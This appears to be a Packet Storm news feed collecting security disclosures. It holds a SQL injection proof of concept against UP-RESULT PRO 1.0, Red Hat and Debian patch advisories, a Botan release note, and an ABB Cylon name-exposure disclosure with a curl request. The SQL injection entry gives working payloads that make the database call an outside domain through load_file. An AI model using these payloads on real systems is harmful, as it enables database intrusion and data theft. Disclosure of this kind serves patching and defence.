UP-RESULT PRO version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: UP-RESULT[pro-1.0] Multiple-SQLi## Author: nu11secur1ty## Date: 10/28/2024## Vendor: https://mayurik.com/## Software:https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The `nid` parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+' wassubmitted in the nid parameter. This payload injects a SQL sub-query thatcalls MySQL's load_file function with a UNC file path that references a URLon an external domain. The application interacted with that domain,indicating that the injected SQL query was executed. The attacker can getall sensitive information from this system when he attacks it online!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: nid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' OR NOT9142=9142 AND 'bbjg'='bbjg    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'';SELECTSLEEP(7)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' AND(SELECT 9083 FROM (SELECT(SLEEP(7)))YMvG) AND 'jiLE'='jiLE    Type: UNION query    Title: MySQL UNION query (NULL) - 3 columns    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' UNION ALLSELECTNULL,CONCAT(0x7178767871,0x6467686f7670716c49467649584a4744416775554961485747416c4b724977454f75787267707268,0x7162627a71),NULL,NULL#---```## Reproduce:[href](https://www.patreon.com/posts/up-result-pro-1-114856979)## Demo PoC:[href](https://www.nu11secur1ty.com/2024/10/up-resultpro-10-multiple-sqli.html)## Time spent:01:27:00

UP-RESULT PRO 1.0 SQL Injection

Red Hat Security Advisory 2024-8317-03 - Logging for Red Hat OpenShift - 5.8.14.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8317.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Logging for Red Hat OpenShift - 5.8.14  
Advisory ID:        RHSA-2024:8317-03  
Product:            logging for Red Hat OpenShift  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8317  
Issue date:         2024-10-29  
Revision:           03  
CVE Names:          CVE-2024-24791  
====================================================================

Summary: 

Logging for Red Hat OpenShift - 5.8.14

Description:

Logging for Red Hat OpenShift - 5.8.14

Solution:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

https://docs.openshift.com/container-platform/4.13/logging/cluster-logging-upgrading.html

CVEs:

CVE-2024-24791

References:

https://access.redhat.com/security/updates/classification/#important  
https://issues.redhat.com/browse/LOG-4671  
https://issues.redhat.com/browse/LOG-6182  
https://issues.redhat.com/browse/LOG-6184  
https://issues.redhat.com/browse/LOG-6266

Red Hat Security Advisory 2024-8317-03

Red Hat Security Advisory 2024-8315-03 - Logging for Red Hat OpenShift - 5.9.8.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8315.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Logging for Red Hat OpenShift - 5.9.8  
Advisory ID:        RHSA-2024:8315-03  
Product:            logging for Red Hat OpenShift  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8315  
Issue date:         2024-10-29  
Revision:           03  
CVE Names:          CVE-2024-24791  
====================================================================

Summary: 

Logging for Red Hat OpenShift - 5.9.8

Description:

Logging for Red Hat OpenShift - 5.9.8

Solution:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

https://docs.openshift.com/container-platform/4.14/logging/cluster-logging-upgrading.html

CVEs:

CVE-2024-24791

References:

https://access.redhat.com/security/updates/classification/#important  
https://issues.redhat.com/browse/LOG-6159  
https://issues.redhat.com/browse/LOG-6169  
https://issues.redhat.com/browse/LOG-6181  
https://issues.redhat.com/browse/LOG-6183  
https://issues.redhat.com/browse/LOG-6206  
https://issues.redhat.com/browse/LOG-6214

Red Hat Security Advisory 2024-8315-03

Red Hat Security Advisory 2024-8314-03 - Logging for Red Hat OpenShift - 6.0.1.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8314.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Logging for Red Hat OpenShift - 6.0.1  
Advisory ID:        RHSA-2024:8314-03  
Product:            logging for Red Hat OpenShift  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8314  
Issue date:         2024-10-29  
Revision:           03  
CVE Names:          CVE-2024-6104  
====================================================================

Summary: 

Logging for Red Hat OpenShift - 6.0.1

Description:

Logging for Red Hat OpenShift - 6.0.1

Solution:

https://docs.openshift.com/container-platform/4.16/release_notes/ocp-4-16-release-notes.html

https://docs.openshift.com/container-platform/4.16/observability/logging/logging-6.0/log6x-upgrading-to-6.html

CVEs:

CVE-2024-6104

References:

https://access.redhat.com/security/updates/classification/#important  
https://issues.redhat.com/browse/LOG-6129  
https://issues.redhat.com/browse/LOG-6151  
https://issues.redhat.com/browse/LOG-6180  
https://issues.redhat.com/browse/LOG-6202

Red Hat Security Advisory 2024-8314-03

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current 3.x.x release.

**Botan C++ Crypto Algorithms Library 3.6.1**

Posted Oct 28, 2024

Site botan.randombit.net

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current 3.x.x release.

Changes: Fixed a bug in x86 CPUID detection introduced in 3.6.0 which would cause crashes on systems which have BMI1 but not BMI2. Fixed a bug in SLH-DSA signing, which did not default to the FIPS required randomized variant. Modified how elliptic curve blinding is performed, reducing the number of self-additions that may occur during multiplication. In speed command line utility, also iterate keygen several times.

tags | library

SHA-256 | 7cb8575d88d232c77174769d7f9e24bb44444160585986eebd66e749cb9a9089

Download | Favorite | View

Botan C++ Crypto Algorithms Library 3.6.1

Debian Linux Security Advisory 5799-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5799-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonOctober 28, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-10229 CVE-2024-10230 CVE-2024-10231Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 130.0.6723.69-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmcfKnwACgkQZF0CR8Nudje0sBAAsYJO23wXH5WDVCouanWuxcBKHrXDSF0RrlPOQP5tJURzc8teVhQodU6aohwckqSyCeYI3/z6NvfVcZFOWVlNQLktcNo8nWw7pMTMkhynk9OA3KCR/LDA3b6TIZxW3z55Sza4TkcJrj+DIUgBFRBzQvFolwP6MRMcjI+kT4To9YemZlED8ZlhtNt4/abKD2suwV5nyzRFPh14sgujtwuF/zPNivuHMQFXNwWfnbIBmJlC+3XO3Ox1IVZ3IcN2tCWM0hvtkGOCOA5e3OXUGuLgWdQWg0J/hlZ8wYwlamDutp/BS3zPxurshDrEY1WOgb7oSl2rM3IgitsnHyyccICgasto7vlYpKJBCfhXDyuR00a+Sfihn91hT2lCodp8x6HazMD8HxutTa+xiihBFgKON/NFK2GvS0EbaCUe5lQe893y7cBAYhHwliXmKuL+9D/H53+UhPJSE97ZOvsLoopTzk2+cgInstHfX1SpNR4rPKN5Sk0VxDbnDiKuSUmPOGqG4xnWLhg9g04lWWNB34nHkq8cPLfGDd0erk8GHHX7/PYTqlLf8cmJppnwNoZffi3B6mk/zbwPCMVaM8odDL9Pc41zooLCGkykglmR6Yw/xbdC9+vrlsFJ/O2ligILTl/9Yf5ZaxemdcE/QEv65VyoYIDs7BkXcpgRIMqo55l5FTI==Rr/n-----END PGP SIGNATURE-----

Debian Security Advisory 5799-1

Debian Linux Security Advisory 5798-1 - Christoper L. Shannon discovered that the implementation of the OpenWire protocol in Apache ActiveMQ was susceptible to the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5798-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
October 26, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : activemq  
CVE ID         : CVE-2023-46604

Christoper L. Shannon discovered that the implementation of the OpenWire  
protocol in Apache ActiveMQ was susceptible to the execution of  
arbitrary code.

For the stable distribution (bookworm), these problems have been fixed in  
version 5.17.2+dfsg-2+deb12u1.

We recommend that you upgrade your activemq packages.

For the detailed security status of activemq please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/activemq

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmccx3gACgkQEMKTtsN8  
TjY5bg//ZDPT1SXTCW7reOmPv3i1J7I8Cv8rNkogL73R1SBE+1C5CutQzAESJkid  
0BzW+q9A2qVvDyxgM8pcxuYI53olVH8fPzDViHYit4K4Ac0o66fmfA42ipC21sNd  
it9Zo1WROyYenvLvGEx4bQXL8UamoVpMCIy/2o5t0b60P5glOjjfqHJadRbvZgJA  
QvdD3UTASnsrqWgf5+4HON9nUBjNJL9cdPkxPkskBVAYJrMpLvNEvkofcB1YIPgs  
UW0UwNJe50CCddeDhOY59nO1m0TAG0gbgEgPJ3U2Zasdou2OqTRFp7wt0RBwmvFW  
wikkyRqfg0sZM4bDZIz74c58qJRd2dJBIShTBQiXB2qcX3v7tNUp+2cVjUUhZq3d  
jXIS1uupmpn4MVIA5CgLFsBsoOzg+Zn7WxXNMih0CIUAUWLmGPrMRiinm4rB81t1  
1zOMpaRByCuO1Tnc03dDaX0sl5ydWc+O2nkRxsWowXXGw/UDMSdNbrLmr/kJwNnR  
cmePkv6PPLBznTWpuk9elriYLn2D8VLvRHx2TGj+W21Qky4QOYUVYVpHgHYW5GpE  
4jkrozdb/GhUUN7QIqssmJzyXGNUBKf+7DBPBUqmV2Pcvp5uNa1s3J0zanP6OKda  
dfnlfI6Ov8WH3O/P60suZF8QBvlRvjnscNaC9HUVZ/ROqgy7MFo=  
=JXv0  
-----END PGP SIGNATURE-----

Debian Security Advisory 5798-1

Debian Linux Security Advisory 5797-1 - Multiple security issues were found in Twisted, an event-based framework for internet applications, which could result in incorrect ordering of HTTP requests or cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5797-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 25, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : twistedCVE ID         : CVE-2023-46137 CVE-2024-41671 CVE-2024-41810Multiple security issues were found in Twisted, an event-based frameworkfor internet applications, which could result in incorrect ordering ofHTTP requests or cross-site scripting.For the stable distribution (bookworm), these problems have been fixed inversion 22.4.0-4+deb12u1.We recommend that you upgrade your twisted packages.For the detailed security status of twisted please refer toits security tracker page at:https://security-tracker.debian.org/tracker/twistedFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcb3uEACgkQEMKTtsN8TjZEtw//VpqsmdlkvjKnR1rYRjoopuH1cx5lSdB5u7EoXGiSKTp9Dt5l2Q44fl+Pi2uLjO/IX5ZbtiWDeNvBoFYfaqvHBlv680WiaUnmvTzPuovB2fT5Q7ZOdI7SH5y2yhYpmaapZSb2kRYgcFO38Vi3M1LxU60t7lSXd3F5+6BopPEBRT9q0nwHAPB8NSvhC/VQQa9BejPIggJD1koYxJlQz76VhAi3c7W60ySRk2YKQryYdyZwdpsvrrz0G05nwZO+f6tXVihehGT2rv5OpfwGmcHZ/iwxY/IFpywdkrsnx1mV2NGVZw3t2JQYl7r/Vs3XLg4C3Zx2NLzZgBp007ZG4vz2f4LmEe9M+bYI8NgCAzPRUJg2T4+ZoD09Dmmlk/yo+ihBxSef3H5nDkiO9a4OsEQzk74o1Hlg1ZbiUqk/7BdSar92LszlzuJVXqpAHVtIIlUwkS+L6Z+O2iYhSBUTumrrrbRsdoo00uvHWeGOw1VmRZKYdMpoxX2St60BRUdBZuIHlcw5qoymiIDOI/fgykCtdAbdCWj/GE6AGO4i7scOj8u8deqh/N5kKNzdijjkzmEQvd7e3/VSEVfBc+4CJHUMKVELaNDGflaneWxXpHLmz/pu2hwNoPw2XL9X1bVzvph3A+Yl+oXLZUJkrELuo9Rmnv7qJ9MS9QnOpHyw0KFgEsQ==faBY-----END PGP SIGNATURE-----

Debian Security Advisory 5797-1

Debian Linux Security Advisory 5796-1 - Multiple security issues were found in libheif, a library to parse HEIF and AVIF files, which could result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5796-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 25, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libheifCVE ID         : CVE-2023-29659 CVE-2023-49462 CVE-2024-41311Multiple security issues were found in libheif, a library to parse HEIFand AVIF files, which could result in denial of service or potentiallythe execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 1.15.1-1+deb12u1.We recommend that you upgrade your libheif packages.For the detailed security status of libheif please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libheifFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcb3t8ACgkQEMKTtsN8Tjb/Zg//dGKfFs/w3AIgnaNKk+evGsFtaBdva6K2zkTOhGzVK+RoBCdP8egjfka+WCUYNQKVQr2XOd4ieih5DYg6CS/Tmn32X34sRN8St9UAz+sFXkkUZ9bBxSDS93LP1H+lGLfhqtHUAJv6febY+6RiAmV6vhzMIAuVTJxjdwGFvOFtu0f2aDQKEHTMIhpjpJDDCmjTciGmzjvSOpzVAw07nbeJFzvE/BR+wLg3fRMNG7RmQhZcG9O4B+RCHaJBzNAM1bM3q1OGkH5Ek3/owyIUtYft3iT2uGKZkZUzwJ4ZvOMxX9qyP22Gxl6+yfm5R1qDoXIBJMGVdjPIan3XK1XfKya9cCQkvNb+75W62WatkJw3TcomCFXXzcv2cKDOAbXGmIZHbAW+q6B5QWP86Ui10sBQsXW9lMmQW8mu4h13ZjgFelUsP6b9MWKKMRzFkqSh9me0bIlEvxl29/2HA08XnpV19//6j8PwANsBlGXnnDes0Y4uKrUKA8Q95zNuWG3owahc7z4+6nY92qoh5sswloIy1dXnhg6KYTuYL5JkxheIfOsh0fLG0eNfv5cV9mWKc9/A5BxSdBQz3x5bBNgH4R1L7z6/0+z/jo1Z6L904F4KsUiWnDeYKJNwhY+iOrDh5wDSrDA4+xVBtOo/q+6pR0c91GGoJImo9AEhXRKMGVKjjvw==JcU1-----END PGP SIGNATURE-----

Debian Security Advisory 5796-1

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated building/project name exposure vulnerability.

**ABB Cylon Aspect 3.08.01 getApplicationNamesJS.php Building/Project Name Exposure**

    ABB Cylon Aspect 3.08.01 (getApplicationNamesJS.php) Building/Project Name ExposureVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The building management system suffers from an unauthenticated building/projectname exposure.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5850Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5850.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ curl http://192.168.73.31/getApplicationNamesJS.phpvar instanceDirectory=["1":"OOU KrstePMisirkov_Kumanovo"];

Source

Packet Storm